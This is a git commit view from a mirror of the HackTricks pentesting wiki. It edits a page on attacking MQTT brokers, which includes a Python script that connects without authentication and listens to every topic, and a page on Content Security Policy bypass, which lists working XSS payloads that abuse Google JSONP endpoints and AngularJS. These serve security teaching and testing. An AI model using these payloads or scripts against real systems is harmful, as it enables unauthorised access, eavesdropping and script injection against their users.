0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [#3360] No subject

This commit is contained in:
CPol 2022-08-12 14:24:34 +00:00 committed by gitbook-bot
parent a7cb149ce8
commit ca31549018
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 15 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View File

@ -1,4 +1,4 @@
# 1883, 8883 - Pentesting MQTT (Mosquitto)
# 1883 - Pentesting MQTT (Mosquitto)
<details>
@ -16,27 +16,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Basic Information
## Basic Information
MQTT stands for MQ Telemetry Transport. It is a publish/subscribe, **extremely simple and lightweight messaging protocol**, designed for constrained devices and low-bandwidth, high-latency or unreliable networks. The design principles are to minimise network bandwidth and device resource requirements whilst also attempting to ensure reliability and some degree of assurance of delivery. These principles also turn out to make the protocol ideal of the emerging “machine-to-machine” (M2M) or “Internet of Things” world of connected devices, and for mobile applications where bandwidth and battery power are at a premium.
**Default port:** 1883 (clear), 8883 (Secure MQTT, MQTT over TLS) [[1][1]]
**Default port:** 1883
```
PORT STATE SERVICE REASON
1883/tcp open mosquitto version 1.4.8 syn-ack
```
# Inspecting the traffic
## Inspecting the traffic
MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**
![](<../.gitbook/assets/image (645) (1).png>)
## [**Brute-Force MQTT**](../brute-force.md#mqtt)
### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt)
# Pentesting MQTT
## Pentesting MQTT
**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.
@ -60,7 +59,6 @@ mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic'
Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
```python
#!/usr/bin/env python
#This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py
import paho.mqtt.client as mqtt
import time
@ -89,11 +87,11 @@ if __name__ == "__main__":
main()
```
# More information
## More information
from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b)
## The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
### The Publish/Subscribe Pattern <a href="#b667" id="b667"></a>
The publish/subscribe model is composed of:
@ -104,7 +102,7 @@ The publish/subscribe model is composed of:
![](https://miro.medium.com/max/1073/1\*sIxvchdgHSqAGebJjFHBAg.png)
## Packet Format <a href="#f15a" id="f15a"></a>
### Packet Format <a href="#f15a" id="f15a"></a>
Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
@ -114,13 +112,9 @@ The first field of the fixed header represents the type of the MQTT Packet. All
![](https://miro.medium.com/max/1469/1\*z0fhdUVzGa0PLikH\_cyBmQ.png)
# Shodan
## Shodan
* `port:1883 MQTT`
* `port:8883 MQTT`
[1]:http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Network_Connections
<details>
@ -137,5 +131,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

7
pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -248,11 +248,14 @@ If the application is using angular JS and scripts are loaded from a whitelisted
Working payloads:
```
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
```html
<script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
<script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)">
```
Other JSONP arbitrary execution endpoints can be found in [**here**](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt) **** (some of them were deleted or fixed)
### Bypass CSP with dangling markup
Read [how here](../dangling-markup-html-scriptless-injection.md).